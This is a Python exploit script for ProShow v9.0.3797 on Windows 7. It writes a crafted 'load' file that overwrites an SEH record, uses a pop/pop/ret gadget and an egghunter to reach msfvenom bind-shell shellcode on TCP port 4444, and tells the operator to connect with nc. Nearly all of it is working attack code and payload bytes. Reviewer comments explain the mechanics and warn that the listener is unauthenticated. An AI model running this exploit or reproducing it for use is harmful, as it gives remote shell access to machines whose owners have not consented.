#!/usr/bin/python
# _*_ coding:utf-8 _*_

# Exploit Title: ProShow v9.0.3797 Local Exploit
# Exploit Author: @Yonatan_Correa
# website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
# Vendor Homepage: http://www.photodex.com/ProShow
# Software Link: http://files.photodex.com/release/pspro_90_3797.exe
# Version: v9.0.3797
# Tested on: Windows 7 (32-bit process; the SEH overwrite, pop/pop/ret address and egghunter below are all x86-specific)

from struct import pack

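informacion = """

ProShow v9.0.3797
http://www.photodex.com/ProShow


execute exploit
create a file called "load"
copy load "C:\\Program Files\\Photodex\\ProShow Producer"
"C:\\Program Files\\Photodex\\ProShow Producer\\proshow.exe"
And connect nc -nv IP_Host 4444

Testing: Windows 7
@Yonatan_Correa
https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
"""


# Stage 2: the actual payload, prefixed with the egghunter tag "yona" twice
# ("yonayona") so the hunter further down can locate it in memory.
#
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -e x86/alpha_mixed LPORT=4444 EXITFUNC=seh -f c
# Payload size: 717 bytes
#
# SECURITY NOTE: windows/shell_bind_tcp opens an *unauthenticated* listener on
# TCP/4444 in the context of the exploited ProShow process. Anyone who can reach
# that port on the victim gets the shell, not just the operator - only run this
# on an isolated lab host, or regenerate the stage as a reverse shell.
# The bytes below are msfvenom output as shipped by the author; they were not
# independently disassembled for this review. All byte strings are bytes
# literals so the file is written identically under Python 2 and Python 3.
shell = b"yonayona" + (
    b"\x89\xe5\xda\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
    b"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
    b"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
    b"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
    b"\x4c\x59\x78\x4f\x72\x57\x70\x65\x50\x45\x50\x53\x50\x6d\x59"
    b"\x39\x75\x75\x61\x4f\x30\x45\x34\x6c\x4b\x30\x50\x66\x50\x6e"
    b"\x6b\x30\x52\x74\x4c\x6e\x6b\x36\x32\x77\x64\x6c\x4b\x72\x52"
    b"\x36\x48\x66\x6f\x4c\x77\x42\x6a\x46\x46\x75\x61\x79\x6f\x4e"
    b"\x4c\x55\x6c\x50\x61\x51\x6c\x55\x52\x64\x6c\x77\x50\x79\x51"
    b"\x38\x4f\x36\x6d\x53\x31\x79\x57\x4a\x42\x49\x62\x42\x72\x42"
    b"\x77\x4e\x6b\x32\x72\x64\x50\x4e\x6b\x71\x5a\x55\x6c\x4c\x4b"
    b"\x32\x6c\x37\x61\x31\x68\x79\x73\x43\x78\x67\x71\x58\x51\x52"
    b"\x71\x4c\x4b\x51\x49\x65\x70\x43\x31\x68\x53\x4c\x4b\x70\x49"
    b"\x42\x38\x4a\x43\x47\x4a\x71\x59\x6c\x4b\x76\x54\x6e\x6b\x53"
    b"\x31\x4e\x36\x64\x71\x79\x6f\x4c\x6c\x69\x51\x38\x4f\x66\x6d"
    b"\x67\x71\x48\x47\x56\x58\x6d\x30\x64\x35\x38\x76\x65\x53\x53"
    b"\x4d\x59\x68\x35\x6b\x73\x4d\x65\x74\x54\x35\x58\x64\x72\x78"
    b"\x4c\x4b\x52\x78\x46\x44\x76\x61\x58\x53\x35\x36\x4c\x4b\x56"
    b"\x6c\x50\x6b\x4e\x6b\x30\x58\x57\x6c\x57\x71\x49\x43\x4e\x6b"
    b"\x75\x54\x4e\x6b\x56\x61\x48\x50\x4f\x79\x42\x64\x75\x74\x64"
    b"\x64\x61\x4b\x43\x6b\x33\x51\x43\x69\x50\x5a\x73\x61\x69\x6f"
    b"\x6b\x50\x63\x6f\x53\x6f\x32\x7a\x6c\x4b\x47\x62\x5a\x6b\x4c"
    b"\x4d\x71\x4d\x43\x58\x70\x33\x77\x42\x35\x50\x53\x30\x35\x38"
    b"\x63\x47\x43\x43\x34\x72\x61\x4f\x46\x34\x71\x78\x62\x6c\x51"
    b"\x67\x67\x56\x73\x37\x39\x6f\x58\x55\x68\x38\x4a\x30\x67\x71"
    b"\x33\x30\x35\x50\x76\x49\x78\x44\x46\x34\x36\x30\x62\x48\x46"
    b"\x49\x6b\x30\x50\x6b\x65\x50\x79\x6f\x48\x55\x43\x5a\x37\x78"
    b"\x50\x59\x62\x70\x5a\x42\x4b\x4d\x51\x50\x70\x50\x73\x70\x30"
    b"\x50\x61\x78\x4b\x5a\x44\x4f\x39\x4f\x39\x70\x69\x6f\x68\x55"
    b"\x4d\x47\x70\x68\x77\x72\x43\x30\x47\x61\x73\x6c\x4f\x79\x4d"
    b"\x36\x52\x4a\x66\x70\x31\x46\x61\x47\x35\x38\x69\x52\x39\x4b"
    b"\x44\x77\x73\x57\x69\x6f\x6b\x65\x76\x37\x71\x78\x78\x37\x4a"
    b"\x49\x64\x78\x39\x6f\x79\x6f\x79\x45\x62\x77\x62\x48\x54\x34"
    b"\x78\x6c\x57\x4b\x79\x71\x79\x6f\x5a\x75\x63\x67\x4e\x77\x33"
    b"\x58\x30\x75\x32\x4e\x70\x4d\x33\x51\x59\x6f\x6a\x75\x65\x38"
    b"\x53\x53\x50\x6d\x71\x74\x47\x70\x4b\x39\x6a\x43\x61\x47\x76"
    b"\x37\x36\x37\x76\x51\x6b\x46\x72\x4a\x37\x62\x52\x79\x63\x66"
    b"\x7a\x42\x6b\x4d\x61\x76\x6f\x37\x32\x64\x55\x74\x45\x6c\x76"
    b"\x61\x75\x51\x4e\x6d\x43\x74\x77\x54\x34\x50\x49\x56\x47\x70"
    b"\x51\x54\x32\x74\x56\x30\x62\x76\x73\x66\x52\x76\x43\x76\x56"
    b"\x36\x62\x6e\x50\x56\x71\x46\x53\x63\x51\x46\x61\x78\x52\x59"
    b"\x5a\x6c\x67\x4f\x4d\x56\x59\x6f\x6e\x35\x6c\x49\x6d\x30\x70"
    b"\x4e\x71\x46\x61\x56\x79\x6f\x44\x70\x45\x38\x56\x68\x4c\x47"
    b"\x45\x4d\x75\x30\x6b\x4f\x79\x45\x4d\x6b\x4b\x4e\x76\x6e\x54"
    b"\x72\x48\x6a\x35\x38\x59\x36\x5a\x35\x6d\x6d\x6d\x4d\x49\x6f"
    b"\x6e\x35\x55\x6c\x36\x66\x43\x4c\x44\x4a\x4d\x50\x59\x6b\x6b"
    b"\x50\x72\x55\x75\x55\x6f\x4b\x32\x67\x74\x53\x74\x32\x70\x6f"
    b"\x72\x4a\x73\x30\x52\x73\x39\x6f\x59\x45\x41\x41"
)

# Filler up to the SEH record: 8 (tag) + 717 (stage) + 9479 = 10204 bytes,
# so nSEH sits at offset 10204 and the handler pointer at 10208.
junk = shell + (b"\x41" * 9479)  # 10204

# nSEH: "jmp short +6" plus two NOPs - hops over the 4-byte handler pointer
# that follows and lands in the NOP sled in front of the egghunter.
nseh = b"\xEB\x06\x90\x90"

# SEH handler: pop/pop/ret gadget per the author. The module it lives in is not
# named here, so this address is tied to exactly v9.0.3797 and will break on a
# rebased or ASLR-enabled module - TODO confirm in a debugger before reuse.
seh = pack('<I', 0x10045f50)  # pop pop ret

nop = b"\x90" * 86
nop2 = b"\x90" * 10

# Stage 1: 32-byte egghunter. It walks memory in pages, using "int 0x2e" with
# eax=2 as a harmless probing syscall so touching an unmapped page returns an
# error instead of crashing, then scasd-compares against the tag "yona" twice
# and jumps just past "yonayona" into the bind-shell stage above.
# NOTE(review): the syscall number (the "push 2 / pop eax") is specific to the
# Windows build - the author tested on Windows 7; verify on other versions.
egg = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x79\x6f\x6e\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# Final layout: [tag+stage][A*9479][nSEH][SEH][NOP*86][egghunter][NOP*10]
todo = junk + nseh + seh + nop + egg + nop2

if __name__ == "__main__":
    # Write the crafted "load" file next to this script; the operator then
    # copies it into the ProShow Producer install directory (see informacion).
    with open("load", "wb") as arch:
        arch.write(todo)

    print(informacion)
    print(" Created File size " + str(len(todo)))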